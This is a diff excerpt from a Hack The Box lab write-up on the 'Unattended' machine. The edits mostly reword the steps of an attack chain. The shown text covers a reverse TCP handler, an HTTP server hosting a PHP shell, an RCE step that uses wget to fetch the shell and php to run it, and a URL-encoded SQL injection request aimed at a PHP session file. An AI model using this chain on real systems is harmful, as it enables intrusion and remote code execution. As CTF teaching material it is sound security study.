varjo/writeups/htb/unattended/Unattended.md

 [*] Started reverse TCP handler on 10.10.16.12:80
 ```

-Our php shell will be hosted on a simple HTTP server, and the RCE will trigger a wget call to fetch it and then execute it.
+Our php shell will be hosted on a simple HTTP server.
+We then just need to use our RCE primitive to make a wget call to fetch our shell, and another to make a call to `php` to execute our shell.

-Host the server
+Host the server:
 ```
 $ sudo python -m http.server 443
 Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
 ```

-Call wget to fetch the php shell
+Call wget to fetch the php shell:
 ```
 GET /index.php?id=25%27+UNION+SELECT+%22main%27+UNION+SELECT+%27/var/lib/php/sessions/sess_0eeec3brj9f8bs109u6ssli5p3%27%3b--+%22%3b--+ HTTP/1.1
 Host: www.nestedflanders.htb